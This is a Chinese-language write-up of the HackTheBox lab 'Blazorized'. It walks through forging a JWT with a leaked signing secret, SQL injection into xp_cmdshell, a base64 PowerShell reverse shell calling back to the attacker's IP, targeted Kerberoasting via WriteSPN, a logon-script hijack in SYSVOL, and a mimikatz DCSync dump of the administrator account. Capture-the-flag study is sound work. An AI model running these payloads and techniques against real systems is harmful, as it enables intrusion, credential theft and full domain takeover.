HTB-Blazorized

提出疑问

  • js抓取然后获得dll这边的手法我这残缺,我正常bp抓包的没有抓取到这个dll的调用
  • jwt这个参数说是用Blazor Traffic Processor工具来分析这个raw,这个raw我翻遍了我的bp我也没有找到

正常步骤

显示爆破了一下子域名,出admin,然后↓这个出现api子域名的调用,写入hosts

image-20250512191310405

广告

然后再点击一下check,浏览了一下发现有不错的广告资料,copy一份

Title: Active Directory

Below are links to projects and posts relating AD red-teaming:

https://github.com/Group3r/Group3r
https://github.com/Leo4j/Amnesiac
https://github.com/JPG0mez/ADCSync
https://github.com/Processus-Thief/HEKATOMB
https://github.com/Mazars-Tech/AD_Miner
https://github.com/AlmondOffSec/PassTheCert
https://github.com/synacktiv/ntdissector
https://github.com/Hackndo/pyGPOAbuse
https://exploit.ph/external-trusts-are-evil.html
https://github.com/SecuraBV/Timeroast
https://github.com/SadProcessor/CypherDog
https://mayfly277.github.io/

Title: Active Directory

Below are links to projects and posts relating AD blue-teaming:

https://github.com/lkarlslund/Adalanche
https://github.com/FalconForceTeam/FalconHound
https://github.com/csababarta/ntdsxtract
https://github.com/adrecon/ADRecon

Title: Uncategorized

The below research papers are uncategorized, and are to be investigated later:

https://thume.ca/2023/12/02/tracing-methods/
https://zakird.com/papers/tangled_web.pdf
https://jhalderm.com/pub/papers/censys-ccs15.pdf
https://jhalderm.com/pub/papers/zmap10gig-woot14.pdf
https://zakird.com/papers/lzr.pdf
https://zakird.com/papers/zlint.pdf
https://zakird.com/papers/zdns.pdf

继续

这边是看他文章说是api这便用的管理员的身份,jwt解一下可以看到管理员的邮箱

image-20250512200244579

然而没有利用点

批量下载dll

1
curl -s http://blazorized.htb/_framework/blazor.boot.json | jq | grep dll | cut -d ':' -f 1 | sed -e 's/\ //g' -e 's/"//g' | xargs -I % curl -s http://blazorized.htb/_framework/% -o ./DLLs/%

image-20250512223702700

伪造JWT

image-20250512223508651

或者通过脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import jwt
from time import time

secret = "8697800004ee25fc33436978ab6e2ed6ee1a97da699a53a53d96cc4d08519e185d14727ca18728bf1efcde454eea6f65b8d466a4fb6550d5c795d9d9176ea6cf021ef9fa21ffc25ac40ed80f4a4473fc1ed10e69eaf957cfc4c67057e547fadfca95697242a2ffb21461e7f554caa4ab7db07d2d897e7dfbe2c0abbaf27f215c0ac51742c7fd58c3cbb89e55ebb4d96c8ab4234f2328e43e095c0f55f79704c49f07d5890236fe6b4fb50dcd770e0936a183d36e4d544dd4e9a40f5ccf6d471bc7f2e53376893ee7c699f48ef392b382839a845394b6b93a5179d33db24a2963f4ab0722c9bb15d361a34350a002de648f13ad8620750495bff687aa6e2f298429d6c12371be19b0daa77d40214cd6598f595712a952c20eddaae76a28d89fb15fa7c677d336e44e9642634f32a0127a5bee80838f435f163ee9b61a67e9fb2f178a0c7c96f160687e7626497115777b80b7b8133cef9a661892c1682ea2f67dd8f8993c87c8c9c32e093d2ade80464097e6e2d8cf1ff32bdbcd3dfd24ec4134fef2c544c75d5830285f55a34a525c7fad4b4fe8d2f11af289a1003a7034070c487a18602421988b74cc40eed4ee3d4c1bb747ae922c0b49fa770ff510726a4ea3ed5f8bf0b8f5e1684fb1bccb6494ea6cc2d73267f6517d2090af74ceded8c1cd32f3617f0da00bf1959d248e48912b26c3f574a1912ef1fcc2e77a28b53d0a"
data = {
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": "superadmin@blazorized.htb",
    "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": "Super_Admin",
    "iss": "http://api.blazorized.htb",
    "aud": "http://admin.blazorized.htb",
    "exp": int(time() + 60 * 60 * 24 * 10),
}

token = jwt.encode(data, secret, algorithm='HS512')

print(token)

虽然生成了,但在我这里没有生效

我直接在我的火狐浏览器的cookie那写不好使,不懂偶,然后我用下边的方法跑了一下就生效了👇

1
2
3
4
let token = 'eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiU3VwZXJfQWRtaW4iLCJpc3MiOiJodHRwOi8vYXBpLmJsYXpvcml6ZWQuaHRiIiwiYXVkIjoiaHR0cDovL2FkbWluLmJsYXpvcml6ZWQuaHRiIiwiZXhwIjoxNzQ3OTI2ODcwfQ.WlUtJeMxxS6QGYaQjJ342qaYs7Jox8dAZRey83cPDUBPAk2nOPgEHpdPevk9Zqh4Gvhoe14NWySswpia9piiwA';

localStorage.setItem('jwt', token);

后台命令执行

1
' or 1=1; EXEC MASTER.sys.xp_cmdshell 'curl 10.10.16.2:444' -- -

nc一下有回显

1
' or 1=1; EXEC MASTER.sys.xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAiACwANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA'-- -

获得shell->nu_1055

1
powershell -Command "Invoke-WebRequest -Uri 'http://10.10.16.2/accesschk.exe' -OutFile 'C:\Temp\accesschk.exe'"

SharpHound.exe -c all

然后传给Kali

1
2
powershell
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\20250513004319_BloodHound.zip"))

横向移动1->rsa_4810

打WriteSPN

image-20250513112813572

为了执行有针对性的 Kerberoasting,我将为 RSA_4810 账户分配一个 SPN。然后我可以作为该假冒服务请求票据,并获得一个使用 RSA_4810 密码加密的票据来破解。

1
2
3
4
PS C:\Temp> . .\PowerView.ps1    
PS C:\Temp> Set-DomainObject -Identity RSA_4810 -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}
PS C:\Temp> Get-DomainUSer RSA_4810 | Get-DomainSPNTicket | Select-Object -ExpandProperty Hash
得到的hash拿去john得到(Ni7856Do9854Ki05Ng0005 #) (?)

横向移动2->ssa_6010

检查下一个用户

image-20250513142416843

可以发现这个用户每分钟登陆一次

1
2
3
4
检查最近登陆时间
[DateTime]::FromFileTime((Get-ADUser SSA_6010 -properties LastLogon).LastLogon)
当前时间
date

检查用户的登陆脚本

1
Get-ADUser SSA_6010 -properties ScriptPath

没有做设置,那就设一个

1
2
3
Get-ADUser SSA_6010 | Set-ADUser -ScriptPath 'ddl'

Get-ADUser SSA_6010 -properties ScriptPath

然后检查可写目录

image-20250513142504726

https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk

1
2
3
4
5
6
7
8
9
upload /home/kali/ppyy/tool/powershell/accesschk.exe C:\Temp\

.\accesschk.exe /accepteula -uwds blazorized\rsa_4810 C:\Windows


然后查查看当前账户对这个文件夹的权限
icacls \Windows\SYSVOL\domain\scripts\A32FF3AEAA23
有完全控制权,进去
cd C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23

然后写码

1
echo "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAiACwANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" | Out-File -FilePath ddl.bat -Encoding ASCII

给成员属性赋值

就是指定脚本文件

1
Get-ADUser SSA_6010 | Set-ADUser -ScriptPath 'A32FF3AEAA23\ddl.bat'

之后监听等1分钟shell就来了

本地DCSync->administrator

image-20250513140453333

有DCSync 权限,SSA_6010 可以导出域中的所有哈希值

把mimikatz传上去

1
2
3
4
powershell -Command "Invoke-WebRequest -Uri 'http://10.10.16.2/mimikatz64.exe' -OutFile 'C:\Temp\mimikatz64.exe'"


.\mimikatz64.exe "lsadump::dcsync /user:administrator" exit

image-20250513135932368

1
2
3
4
5
6
7
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\\dfm.a', $SecPassword)

Set-DomainObject -Credential $Cred -Identity harmj0y -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}

Get-DomainSPNTicket -Credential $Cred harmj0y | fl

参考